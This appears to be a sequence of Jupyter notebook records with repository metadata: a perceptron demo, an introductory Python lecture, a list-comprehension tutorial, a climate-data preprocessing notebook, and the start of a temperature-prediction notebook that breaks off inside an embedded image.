if (y * (nd.dot(w,x) + b)).asscalar() <= 0:\n w += y * x\n b += y\n return 1\n else:\n return 0\n\nw = nd.zeros(shape=(2))\nb = nd.zeros(shape=(1))\nfor (x,y) in zip(X,Y):\n res = perceptron(w,b,x,y)\n if (res == 1):\n print('Encountered an error and updated parameters')\n print('data {}, label {}'.format(x.asnumpy(),y.asscalar()))\n print('weight {}, bias {}'.format(w.asnumpy(),b.asscalar()))\n plotscore(w,b)\n plotdata(X,Y)\n plt.scatter(x[0].asscalar(), x[1].asscalar(), color='g')\n plt.show()", "Encountered an error and updated parameters\ndata [-2.0401056 1.482131 ], label -1.0\nweight [ 2.0401056 -1.482131 ], bias -1.0\n" ] ], [ [ "## Perceptron Convergence in Action", "_____no_output_____" ] ], [ [ "Eps = np.arange(0.025, 0.45, 0.025)\nErr = np.zeros(shape=(Eps.size))\n\nfor j in range(10):\n for (i,epsilon) in enumerate(Eps):\n X, Y = getfake(1000, 2, epsilon)\n\n for (x,y) in zip(X,Y):\n Err[i] += perceptron(w,b,x,y)\n\nErr = Err / 10.0 ", "_____no_output_____" ], [ "plt.plot(Eps, Err, label='average number of updates for training')\nplt.legend()\nplt.show()", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ] ]
cb2093b665bffbcfa92ee38121ed7316089fb85d
35,893
ipynb
Jupyter Notebook
lectures/L2.ipynb
eds-uga/csci1360e-su17
605083bbdca853e4cf5772b43a2522a09f440946
[ "MIT" ]
null
null
null
lectures/L2.ipynb
eds-uga/csci1360e-su17
605083bbdca853e4cf5772b43a2522a09f440946
[ "MIT" ]
null
null
null
lectures/L2.ipynb
eds-uga/csci1360e-su17
605083bbdca853e4cf5772b43a2522a09f440946
[ "MIT" ]
1
2020-08-01T08:25:28.000Z
2020-08-01T08:25:28.000Z
20.771412
551
0.526704
[ [ [ "# Lecture 2: Introducing Python\n\nCSCI 1360E: Foundations for Informatics and Analytics", "_____no_output_____" ], [ "## Overview and Objectives", "_____no_output_____" ], [ "In this lecture, I'll introduce the Python programming language and how to interact with it; aka, the proverbial [Hello, World!](https://en.wikipedia.org/wiki/%22Hello,_World!%22_program) lecture. By the end, you should be able to:", "_____no_output_____" ], [ " - Recall basic history and facts about Python (relevance in scientific computing, comparison to other languages)\n - Print arbitrary strings in a Python environment\n - Create and execute basic arithmetic operations\n - Understand and be able to use variable assignment and update", "_____no_output_____" ], [ "## Part 1: Background", "_____no_output_____" ], [ "Python as a language was implemented from the start by Guido van Rossum. What was originally something of a [snarkily-named hobby project to pass the holidays](https://www.python.org/doc/essays/foreword/) turned into a huge open source phenomenon used by millions.", "_____no_output_____" ], [ "![guido](Lecture2/guido.png)", "_____no_output_____" ], [ "### Python's history", "_____no_output_____" ], [ "The original project began in 1989.", "_____no_output_____" ], [ " - Release of Python 2.0 in 2000", "_____no_output_____" ], [ " - Release of Python 3.0 in 2008", "_____no_output_____" ], [ " - Latest stable release of these branches are **2.7.12**--which Guido *emphatically* insists is the final, final, final release of the 2.x branch--and **3.5.3** (which is what we're using in this course)", "_____no_output_____" ], [ "Wondering why a 2.x branch has survived a *decade and a half* after its initial release?", "_____no_output_____" ], [ "Python 3 was designed as backwards-incompatible; a good number of syntax changes and other internal improvements made the majority of code written for Python 2 unusable in Python 3.", "_____no_output_____" ], [ "This made it difficult for power users and developers to upgrade, particularly when they relied on so many third-party libraries for much of the heavy-lifting in Python.", "_____no_output_____" ], [ "Until these third-party libraries were themselves converted to Python 3 (really only in the past couple years!), most developers stuck with Python 2.", "_____no_output_____" ], [ "### Python, the Language", "_____no_output_____" ], [ "Python is an **intepreted** language.", "_____no_output_____" ], [ "Contrast with **compiled** languages like C, C++, and Java.", "_____no_output_____" ], [ "In practice, the distinction between **interpreted** and **compiled** has become blurry, particularly in the past decade.", "_____no_output_____" ], [ " - Interpreted languages *in general* are easier to use but run more slowly and consume more resources", "_____no_output_____" ], [ " - Compiled languages *in general* have a higher learning curve for programming, but run much more efficiently", "_____no_output_____" ], [ "As a consequence of these advantages and disadvantages, modern programming languages have attempted to combine the best of both worlds:", "_____no_output_____" ], [ " - Java is initially compiled into bytecode, which is then run through the Java Virtual Machine (JVM) which acts as an interpreter. 
In this sense, it is both a compiled language and an interpreted language.", "_____no_output_____" ], [ " - Python runs on a reference implementation, CPython, in which chunks of Python code are compiled into intermediate representations and executed.", "_____no_output_____" ], [ " - [Julia](http://julialang.org/), a relative newcomer in programming languages designed for scientific computing and data science, straddles a middle ground in a different way: using a \"just-in-time\" (JIT) compilation scheme, whereby code is compiled *as the program runs*, theoretically providing the performance of compiled programs with the ease of use of interpreted programs. JIT compilers have proliferated for other languages as well, including Python (but these are well beyond the scope of this course; take CSCI 4360 if interested!)", "_____no_output_____" ], [ "Python is a very **general** language.", "_____no_output_____" ], [ " - Not designed as a specialized language for performing a specific task. Instead, it relies on third-party developers to provide these extras.", "_____no_output_____" ], [ "![xkcd](Lecture2/python.png)", "_____no_output_____" ], [ "Instead, as [Jake VanderPlas](http://jakevdp.github.io/) put it:", "_____no_output_____" ], [ "> \"Python syntax is the glue that holds your data science code together. As many scientists and statisticians have found, Python excels in that role because it is powerful, intuitive, quick to write, fun to use, and above all extremely useful in day-to-day data science tasks.\"", "_____no_output_____" ], [ "### Zen of Python", "_____no_output_____" ], [ "One of the biggest reasons for Python's popularity is its overall simplicity and ease of use.", "_____no_output_____" ], [ "Python was designed *explicitly* with this in mind!", "_____no_output_____" ], [ "It's so central to the Python ethos, in fact, that it's baked into every Python installation. Tim Peters wrote a \"poem\" of sorts, *The Zen of Python*, that anyone with Python installed can read.", "_____no_output_____" ], [ "To see it, just type one line of Python code (yes, this is *live Python code*):", "_____no_output_____" ] ], [ [ "import this", "The Zen of Python, by Tim Peters\n\nBeautiful is better than ugly.\nExplicit is better than implicit.\nSimple is better than complex.\nComplex is better than complicated.\nFlat is better than nested.\nSparse is better than dense.\nReadability counts.\nSpecial cases aren't special enough to break the rules.\nAlthough practicality beats purity.\nErrors should never pass silently.\nUnless explicitly silenced.\nIn the face of ambiguity, refuse the temptation to guess.\nThere should be one-- and preferably only one --obvious way to do it.\nAlthough that way may not be obvious at first unless you're Dutch.\nNow is better than never.\nAlthough never is often better than *right* now.\nIf the implementation is hard to explain, it's a bad idea.\nIf the implementation is easy to explain, it may be a good idea.\nNamespaces are one honking great idea -- let's do more of those!\n" ] ], [ [ "Lack of any discernible meter or rhyming scheme aside, it nonetheless encapsulates the spirit of the Python language. 
These two lines are particular favorites of mine:", "_____no_output_____" ], [ " If the implementation is hard to explain, it's a bad idea.\n If the implementation is easy to explain, it may be a good idea.", "_____no_output_____" ], [ "Line 1:\n - If you wrote the code and can't explain it\\*, go back and fix it.\n - If you didn't write the code and can't explain it, get the person who wrote it to fix it.", "_____no_output_____" ], [ "Line 2:\n - \"Easy to explain\": necessary and sufficient for good code?", "_____no_output_____" ], [ "Don't you just feel so zen right now?", "_____no_output_____" ], [ "\\* Lone exception to this rule: **code golf**", "_____no_output_____" ], [ "![codegolf](Lecture2/codegolf.png)", "_____no_output_____" ], [ "![codegolf_solution](Lecture2/codegolf_solution.png)", "_____no_output_____" ], [ "The goal of *code golf* is to write a program that achieves a certain objective **using as few characters as possible**.", "_____no_output_____" ], [ "The result is the complete gibberish you see in this screenshot. Fun for competitive purposes; insanely *not*-useful for real-world problems.", "_____no_output_____" ], [ "## Part 2: Hello, World!", "_____no_output_____" ], [ "Enough reading, time for some coding, amirite?", "_____no_output_____" ] ], [ [ "print(\"Hello, world!\")", "Hello, world!\n" ] ], [ [ "Yep! That's all there is to it.", "_____no_output_____" ], [ "Just for the sake of being thorough, though, let's go through this command in painstaking detail.", "_____no_output_____" ], [ "**Functions**: `print()` is a function.", "_____no_output_____" ], [ " - Functions take input, perform an operation on it, and give back (return) output.", "_____no_output_____" ], [ "You can think of it as a direct analog of the mathematical term, $f(x) = y$. In this case, $f()$ is the function; $x$ is the input, and $y$ is the output. \nLater in the course, we'll see how to create our own functions, but for now we'll make use of the ones Python provides us by default.", "_____no_output_____" ], [ "**Arguments**: the input to the function.", "_____no_output_____" ], [ " - Interchangeable with \"parameters\".", "_____no_output_____" ], [ "In this case, there is only one argument to `print()`: a string of text that we want printed out. This text, in Python parlance, is called a \"string\". 
I can only presume it is so named because it is a *string* of individual characters.", "_____no_output_____" ], [ "We can very easily change the argument we pass to `print()`:", "_____no_output_____" ] ], [ [ "print(\"This is not the same argument as before.\")", "This is not the same argument as before.\n" ] ], [ [ "We could also print out an empty string, or even no string at all.", "_____no_output_____" ] ], [ [ "print(\"\") # this is an empty string", "\n" ], [ "print() # this is just nothing", "\n" ] ], [ [ "In both cases, the output looks pretty much the same...because it is: just a blank line.", "_____no_output_____" ], [ " - After `print()` finishes printing your input, it prints one final character--a *newline*.", "_____no_output_____" ], [ "This is basically the programmatic equivalent of hitting `Enter` at the end of a line, moving the cursor down to the start of the next line.", "_____no_output_____" ], [ "### What are \"strings\"?", "_____no_output_____" ], [ "Briefly--a type of data format in Python that exclusively uses alphanumeric (A through Z, 0 through 9) characters.", "_____no_output_____" ], [ "Look for the double-quotes!", "_____no_output_____" ] ], [ [ "\"5\" # This is a string.\n5 # This is NOT a string.", "_____no_output_____" ] ], [ [ "### What are the hashtags? (`#`)", "_____no_output_____" ], [ "Delineators for *comments*.", "_____no_output_____" ], [ " - Comments are lines in your program that the language ignores entirely.", "_____no_output_____" ], [ " - When you type a `#` in Python, everything *after* that symbol on the same line is ignored by Python.", "_____no_output_____" ], [ "They're there purely for the developers as a way to put documentation and clarifying statements directly into the code. It's a practice I **strongly** encourage everyone to do--even just to remind yourself what you were thinking! I can't count the number of times I worked on code, set it aside for a month, then came back to it and had absolutely no idea what I was doing)", "_____no_output_____" ], [ "## Part 3: Beyond \"Hello, World!\"", "_____no_output_____" ], [ "Ok, so Python can print strings. That's cool. Can it do anything that's actually useful?", "_____no_output_____" ], [ "Python has a lot of built-in objects and data structures that are very useful for more advanced operations--and we'll get to them soon enough!--but for now, you can use Python to perform basic arithmetic operations.", "_____no_output_____" ], [ "Addition, subtraction, multiplication, division--they're all there. 
You can use it as a glorified calculator:", "_____no_output_____" ] ], [ [ "3 + 4", "_____no_output_____" ], [ "3 - 4", "_____no_output_____" ], [ "3 * 4", "_____no_output_____" ], [ "3 / 4", "_____no_output_____" ] ], [ [ "Python respects order of operations, too, performing them as you'd expect:", "_____no_output_____" ] ], [ [ "3 + 4 * 6 / 2 - 5", "_____no_output_____" ], [ "(3 + 4) * 6 / (2 - 5)", "_____no_output_____" ] ], [ [ "Python even has a really cool exponent operator, denoted by using two stars right next to each other:", "_____no_output_____" ] ], [ [ "2 ** 3 # 2 raised to the 3rd power", "_____no_output_____" ], [ "3 ** 2 # 3 squared", "_____no_output_____" ], [ "25 ** (1 / 2) # Square root of 25", "_____no_output_____" ] ], [ [ "Now for something really neat:", "_____no_output_____" ] ], [ [ "x = 2\nx * 3", "_____no_output_____" ] ], [ [ "This is an example of using Python *variables*.", "_____no_output_____" ], [ " - Variables store and maintain values that can be updated and manipulated as the program runes.", "_____no_output_____" ], [ " - You can name a variable whatever you like, as long as it doesn't start with a number (\"`5var`\" would be illegal, but \"`var5`\" would be fine) or conflict with reserved Python words (like `print`).", "_____no_output_____" ], [ "Here's an operation that involves two variables:", "_____no_output_____" ] ], [ [ "x = 2\ny = 3\nx * y", "_____no_output_____" ] ], [ [ "We can assign the result of operations with variables to other variables:", "_____no_output_____" ] ], [ [ "x = 2\ny = 3\nz = x * y\nprint(z)", "6\n" ] ], [ [ "The use of the equals sign `=` is called the *assignment operator*.", "_____no_output_____" ], [ " - \"Assignment\" takes whatever value is being computed on the right-hand side of the equation and *assigns* it to the variable on the left-hand side.", "_____no_output_____" ], [ " - Multiplication (`*`), Division (`/`), Addition (`+`), and Subtraction (`-`) are also *operators*.", "_____no_output_____" ], [ "What happens if I perform an assignment on something that can't be assigned a different value...such as, say, a number?", "_____no_output_____" ] ], [ [ "x = 2\ny = 3", "_____no_output_____" ], [ "5 = x * y", "_____no_output_____" ] ], [ [ "**CRASH!**", "_____no_output_____" ], [ "Ok, not really; Python technically did what it was supposed to do. It threw an error, alerting you that something in your program didn't work for some reason. In this case, the error message is `can't assign to literal`.", "_____no_output_____" ], [ "Parsing out the `SyntaxError` message:", "_____no_output_____" ], [ " - `Error` is an obvious hint. `Syntax` gives us some context.", "_____no_output_____" ], [ " - We did something wrong that involves Python's syntax, or the structure of its language.", "_____no_output_____" ], [ "The \"`literal`\" being referred to is the number 5 in the statement: `5 = x * y`", "_____no_output_____" ], [ " - We are attempting to assign the result of the computation of `x * y` to the number 5", "_____no_output_____" ], [ " - However, 5 is known internally to Python as a \"literal\"", "_____no_output_____" ], [ " - 5 is literally 5; you can't change the value of 5! (5 = 8? NOPE)", "_____no_output_____" ], [ "So we can't assign values to numbers. What about assigning values to a variable that's used in the very same calculation?", "_____no_output_____" ] ], [ [ "x = 2\ny = 3\nx = x * y\nprint(x)", "6\n" ] ], [ [ "This works just fine! 
In fact, it's more than fine--this is such a standard operation, it has its own operator:", "_____no_output_____" ] ], [ [ "x = 2\ny = 3\nx *= y\nprint(x)", "6\n" ] ], [ [ "Out loud, it's pretty much what it sounds like: \"x times equals y\".", "_____no_output_____" ], [ "This is an instance of a shorthand operator.", "_____no_output_____" ], [ " - We multiplied `x` by `y` and stored the product in `x`, effectively updating it.", "_____no_output_____" ], [ " - There are many instances where you'll want to increment a variable: for example, when counting how many of some \"thing\" you have.", "_____no_output_____" ], [ " - All the other operators have the same shorthand-update versions: `+=` for addition, `-=` for subtraction, and `/=` for division.", "_____no_output_____" ], [ "## Review Questions", "_____no_output_____" ], [ "1: Let's say you want to count the number of words in Wikipedia. You have a variable to track this count: `word_count = 0`. For every word you come across, you'll update this counter by 1. Using the shorthand you saw before, what would the command be to update the variable at each word?\n\n2: What would happen if I ran this command? Explain. `(\"5\" + 5)`\n\n3: In this lecture, we used what is essentially a Python shell in order to execute Python commands. Let's say, instead, we wanted to run a sequence of commands in a script. I've put a couple commands in the file `commands.py`. How would you execute this script from the command prompt?\n\n4: What would happen if I ran this command? Explain. `x = y`", "_____no_output_____" ], [ "## Course Administrivia", "_____no_output_____" ], [ " - If you haven't done so yet, please **let me know to what email address you'd like me to send a Slack invite.** If I haven't heard from you by Thursday morning, I'll use your UGA address.", "_____no_output_____" ], [ " - Please check out the revamped [course website](https://eds-uga.github.io/csci1360e-su17/) if you have questions; it should have pretty much all the information you need about the course!", "_____no_output_____" ], [ " - Assignment 0 comes out tomorrow! It doesn't have a deadline, but is instead an introduction to using JupyterHub. Please go through it, as we'll be using JupyterHub all semester for both homeworks AND exams!", "_____no_output_____" ], [ "## Additional Resources\n\n 1. Guido's PyCon 2016 talk on the future of Python: https://www.youtube.com/watch?v=YgtL4S7Hrwo\n 2. VanderPlas, Jake. *Python Data Science Handbook*. 2016 (pre-release).", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ] ]
cb209563fbdac1ad3f981957b857012cd5d978e9
4,680
ipynb
Jupyter Notebook
Python-Programming/Python-3-Bootcamp/02-Python Statements/.ipynb_checkpoints/06-List Comprehensions-checkpoint.ipynb
vivekparasharr/Learn-Programming
1ae07ef5143bff3c504978e1d375698820f59af0
[ "MIT" ]
null
null
null
Python-Programming/Python-3-Bootcamp/02-Python Statements/.ipynb_checkpoints/06-List Comprehensions-checkpoint.ipynb
vivekparasharr/Learn-Programming
1ae07ef5143bff3c504978e1d375698820f59af0
[ "MIT" ]
null
null
null
Python-Programming/Python-3-Bootcamp/02-Python Statements/.ipynb_checkpoints/06-List Comprehensions-checkpoint.ipynb
vivekparasharr/Learn-Programming
1ae07ef5143bff3c504978e1d375698820f59af0
[ "MIT" ]
null
null
null
21.46789
201
0.483333
[ [ [ "# List Comprehensions\n\nIn addition to sequence operations and list methods, Python includes a more advanced operation called a list comprehension.\n\nList comprehensions allow us to build out lists using a different notation. You can think of it as essentially a one line <code>for</code> loop built inside of brackets. For a simple example:\n## Example 1", "_____no_output_____" ] ], [ [ "# Grab every letter in string\nlst = [x for x in 'word']", "_____no_output_____" ], [ "# Check\nlst", "_____no_output_____" ] ], [ [ "This is the basic idea of a list comprehension. If you're familiar with mathematical notation this format should feel familiar for example: x^2 : x in { 0,1,2...10 } \n\nLet's see a few more examples of list comprehensions in Python:\n## Example 2", "_____no_output_____" ] ], [ [ "# Square numbers in range and turn into list\nlst = [x**2 for x in range(0,11)]", "_____no_output_____" ], [ "lst", "_____no_output_____" ] ], [ [ "## Example 3\nLet's see how to add in <code>if</code> statements:", "_____no_output_____" ] ], [ [ "# Check for even numbers in a range\nlst = [x for x in range(11) if x % 2 == 0]", "_____no_output_____" ], [ "lst", "_____no_output_____" ] ], [ [ "## Example 4\nCan also do more complicated arithmetic:", "_____no_output_____" ] ], [ [ "# Convert Celsius to Fahrenheit\ncelsius = [0,10,20.1,34.5]\n\nfahrenheit = [((9/5)*temp + 32) for temp in celsius ]\n\nfahrenheit", "_____no_output_____" ] ], [ [ "## Example 5\nWe can also perform nested list comprehensions, for example:", "_____no_output_____" ] ], [ [ "lst = [ x**2 for x in [x**2 for x in range(11)]]\nlst", "_____no_output_____" ] ], [ [ "Later on in the course we will learn about generator comprehensions. After this lecture you should feel comfortable reading and writing basic list comprehensions.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
cb209999c0a26f36a713b22c21a9e91dd2d84cdd
7,729
ipynb
Jupyter Notebook
MAPS/Latant_Space_Constrained_VAEs/Mooers_Logbook/Diunral_Cycles/Preprocessor_For_W_Variable_Data.ipynb
gmooers96/CBRAIN-CAM
c5a26e415c031dea011d7cb0b8b4c1ca00751e2a
[ "MIT" ]
null
null
null
MAPS/Latant_Space_Constrained_VAEs/Mooers_Logbook/Diunral_Cycles/Preprocessor_For_W_Variable_Data.ipynb
gmooers96/CBRAIN-CAM
c5a26e415c031dea011d7cb0b8b4c1ca00751e2a
[ "MIT" ]
null
null
null
MAPS/Latant_Space_Constrained_VAEs/Mooers_Logbook/Diunral_Cycles/Preprocessor_For_W_Variable_Data.ipynb
gmooers96/CBRAIN-CAM
c5a26e415c031dea011d7cb0b8b4c1ca00751e2a
[ "MIT" ]
5
2019-09-30T20:17:13.000Z
2022-03-01T07:03:30.000Z
35.454128
209
0.618579
[ [ [ "import numpy as np\nimport itertools\nimport math\nimport scipy\nfrom scipy import spatial\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport matplotlib.patches as patches\nfrom matplotlib import animation\nfrom matplotlib import transforms\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nimport xarray as xr\nimport dask\nfrom sklearn.cluster import KMeans\nfrom sklearn.cluster import AgglomerativeClustering\nimport pandas as pd\nimport netCDF4", "_____no_output_____" ], [ "def plot_generator_paper(sample, X, Z):\n \n fz = 15*1.25\n lw = 4\n siz = 100\n XNNA = 1.25 # Abscissa where architecture-constrained network will be placed\n XTEXT = 0.25 # Text placement\n YTEXT = 0.3 # Text placement\n \n plt.rc('text', usetex=False)\n matplotlib.rcParams['mathtext.fontset'] = 'stix'\n matplotlib.rcParams['font.family'] = 'STIXGeneral'\n #mpl.rcParams[\"font.serif\"] = \"STIX\"\n plt.rc('font', family='serif', size=fz)\n matplotlib.rcParams['lines.linewidth'] = lw\n \n \n cmap=\"RdBu_r\"\n fig, ax = plt.subplots(1,1, figsize=(15,6))\n cs0 = ax.pcolor(X, Z, sample, cmap=cmap, vmin=-1.0, vmax = 1.0)\n ax.set_title(\"Anomalous Vertical Velocity Field Detected By ELBO\")\n ax.set_ylim(ax.get_ylim()[::-1])\n ax.set_xlabel(\"CRMs\", fontsize=fz*1.5)\n ax.xaxis.set_label_coords(0.54,-0.05)\n h = ax.set_ylabel(\"hPa\", fontsize = fz*1.5)\n h.set_rotation(0)\n ax.yaxis.set_label_coords(-0.10,0.44)\n #y_ticks = np.arange(1350, 0, -350)\n #ax.set_yticklabels(y_ticks, fontsize=fz*1.33)\n ax.tick_params(axis='x', labelsize=fz*1.33)\n ax.tick_params(axis='y', labelsize=fz*1.33)\n divider = make_axes_locatable(ax)\n cax = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n cbar = fig.colorbar(cs0, cax=cax)\n cbar.set_label(label=r'$\\left(\\mathrm{m\\ s^{-1}}\\right)$', rotation=\"horizontal\", fontsize=fz*1.5, labelpad=30, y = 0.65)\n plt.show()\n #plt.savefig(\"/fast/gmooers/gmooers_git/CBRAIN-CAM/MAPS/CI_Figure_Data/Anomaly.pdf\")\n \n#plot_generator(test[0,:,:])", "_____no_output_____" ], [ "path_to_file = '/DFS-L/DATA/pritchard/gmooers/Workflow/MAPS/SPCAM/100_Days/New_SPCAM5/archive/TimestepOutput_Neuralnet_SPCAM_216/atm/hist/TimestepOutput_Neuralnet_SPCAM_216.cam.h1.2009-01-20-00000.nc'\nextra_variables = xr.open_dataset(path_to_file)\nlats = np.squeeze(extra_variables.LAT_20s_to_20n.values)\nlons = np.squeeze(extra_variables.LON_0e_to_360e.values)", "_____no_output_____" ], [ "path_to_file = '/DFS-L/DATA/pritchard/gmooers/Workflow/MAPS/SPCAM/100_Days/New_SPCAM5/archive/TimestepOutput_Neuralnet_SPCAM_216/atm/hist/TimestepOutput_Neuralnet_SPCAM_216.cam.h1.20*'\nextra_variables = xr.open_mfdataset(path_to_file)\namazon = xr.DataArray.squeeze(extra_variables.CRM_W_LON_0e_to_360e_LAT_20s_to_20n[:,:,:,:,10,-29])\natlantic = xr.DataArray.squeeze(extra_variables.CRM_W_LON_0e_to_360e_LAT_20s_to_20n[:,:,:,:,10,121])\nprint(amazon.shape)", "_____no_output_____" ], [ "others = netCDF4.Dataset(\"/fast/gmooers/Raw_Data/extras/TimestepOutput_Neuralnet_SPCAM_216.cam.h1.2009-01-01-00000.nc\")\nlevs = np.array(others.variables['lev'])\nnew = np.flip(levs)\ncrms = np.arange(1,129,1)\nXs, Zs = np.meshgrid(crms, new)", "_____no_output_____" ], [ "Max_Scalar = np.load(\"/fast/gmooers/Preprocessed_Data/W_Variable/Space_Time_Max_Scalar.npy\")\nMin_Scalar = np.load(\"/fast/gmooers/Preprocessed_Data/W_Variable/Space_Time_Min_Scalar.npy\")", "_____no_output_____" ], [ "day_images = amazon[16:112,:,:]\nweek_images = amazon[16:112*6+16,:,:]\nsynoptic_imagess = amazon[16:112*13,:,:]\n\natlantic_day_images = 
atlantic[5:101,:,:]\natlantic_week_images = atlantic[5:96*7+5,:,:]\natlantic_synoptic_imagess = atlantic[5:96*14+5,:,:]", "_____no_output_____" ], [ "Test_Day = np.interp(day_images, (Min_Scalar, Max_Scalar), (0, 1))\nTest_Week = np.interp(week_images, (Min_Scalar, Max_Scalar), (0, 1))\nTest_Synoptic = np.interp(synoptic_imagess, (Min_Scalar, Max_Scalar), (0, 1))\n\natlantic_Test_Day = np.interp(atlantic_day_images, (Min_Scalar, Max_Scalar), (0, 1))\natlantic_Test_Week = np.interp(atlantic_week_images, (Min_Scalar, Max_Scalar), (0, 1))\natlantic_Test_Synoptic = np.interp(atlantic_synoptic_imagess, (Min_Scalar, Max_Scalar), (0, 1))", "_____no_output_____" ], [ "np.save(\"/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_test_day.npy\",Test_Day)\nnp.save(\"/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_test_week.npy\",Test_Week)\nnp.save(\"/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_test_synoptic.npy\",Test_Synoptic)", "_____no_output_____" ], [ "np.save(\"/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_atlantic_test_day.npy\",atlantic_Test_Day)\nnp.save(\"/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_atlantic_test_week.npy\",atlantic_Test_Week)\nnp.save(\"/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_atlantic_test_synoptic.npy\",atlantic_Test_Synoptic)", "_____no_output_____" ], [ "All_amazon = np.interp(amazon[16:,:,:], (Min_Scalar, Max_Scalar), (0, 1))\nAll_Atlantic = np.interp(atlantic[5:,:,:], (Min_Scalar, Max_Scalar), (0, 1))", "_____no_output_____" ], [ "np.save(\"/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_test_amazon_all.npy\",All_amazon)\nnp.save(\"/fast/gmooers/Preprocessed_Data/Single_Amazon_Unaveraged/w_var_test_atlantic_all.npy\",All_Atlantic)", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
cb209a84e4f0d5dc45e9d76ecc2063cd49b4513d
223,596
ipynb
Jupyter Notebook
Embedded Software/Algorithm/BAVA_Temp_Predictions.ipynb
JaccoVeldscholten/SmartDispenser
6b3dfddaeef67293853557a0e8b6b49ca562f1db
[ "MIT" ]
null
null
null
Embedded Software/Algorithm/BAVA_Temp_Predictions.ipynb
JaccoVeldscholten/SmartDispenser
6b3dfddaeef67293853557a0e8b6b49ca562f1db
[ "MIT" ]
null
null
null
Embedded Software/Algorithm/BAVA_Temp_Predictions.ipynb
JaccoVeldscholten/SmartDispenser
6b3dfddaeef67293853557a0e8b6b49ca562f1db
[ "MIT" ]
null
null
null
159.82559
40,244
0.841907
[ [ [ "<a href=\"https://colab.research.google.com/github/JaccoVeldscholten/SmartDispenser/blob/main/BAVA_Temp_Predictions.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>", "_____no_output_____" ], [ "<div>\n<img src=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABpQAAAIHCAYAAACR5L9TAAAACXBIWXMAAC4jAAAuIwF4pT92AAAgAElEQVR4nOzdS3IcyZUw6ujfeo76Z5kjVE9zguoVAL0CsFdAagWiViBqBaJWINYKRKxA5ApEDG5Om5jczFkXVnCvBeEsIJnxcI/IR3j495mVSa22biUiwl/nuB//t/9n8/++qaqq/gc4rq/hny6fGv53v60Wyy/eDcB8rbebd1VV3XjFg9Vj5atMfzsToA0O9m61WDbNXwGOYr3dvK2qypif7v1qsfyY24/mfNbbzS/1d+MVjGKexCz9e1VVP1dVde31wtHFtLM/N/2H6+3mx//o4Yfk1I/Jqt8HLIMXQBbq4MiFVzVcvei1AYMRvloTDfKmZUMUwLHUc6ZLTzeZjeSkemNuNJp5ErP0714rZOnyh0n0j4P874mpH5JRn8O/vkxAfRvcJJ4AzmO93bySTDqINyHIBMlWi+WH9XbzXltM5pQAcDLhxIRkUrq71WLZVy0FfmSMH88zZJYklKAs3xNPLxNQ35JPLxJP93XpoKqqvoR//aTsHsBR2TF6GK8klBipLgX02kNMclEnxZVRAk7EnGkYfTRJJG8PxjyJWZJQAn50Ff7n70mnlwmn76X2Pn0/5eRkE8Bw6+3mp6qqbj3Cg7hcbzc3xiVGkFAa5pVgJXAidvsPo48mleTt4bzRBpkbCSUgxfdSe7+fcHqRaPoS/qkDeV9Wi+VvnixAL4GRw1KnnMHq3aPr7eZR2btk+jHg6JyYGOzO2pwBJJQO57beRKgdMif/x9sEDuAy7LCvTzP9s6qq/11vN1/X200dmHlX7xj3kAEaCcQelufJWB88wWQX4S44gGOyphzGyQiSuN/1KMyTmBUJJeBYdpJM6+3m/1tvN5/qC6/rCUoo8wRQLOXujkJgm7EklIbR7oBjc2JiGAklUhnTD88zZVYklIBTqkvl/bGqqn+EU0xfnGACCmZhcRyeK4OtFssvoZQvabQ74GjW283PL+76Jd6vymwxgDH98G5DPwazIKEEnNPVixNMv4USeW8MtEAh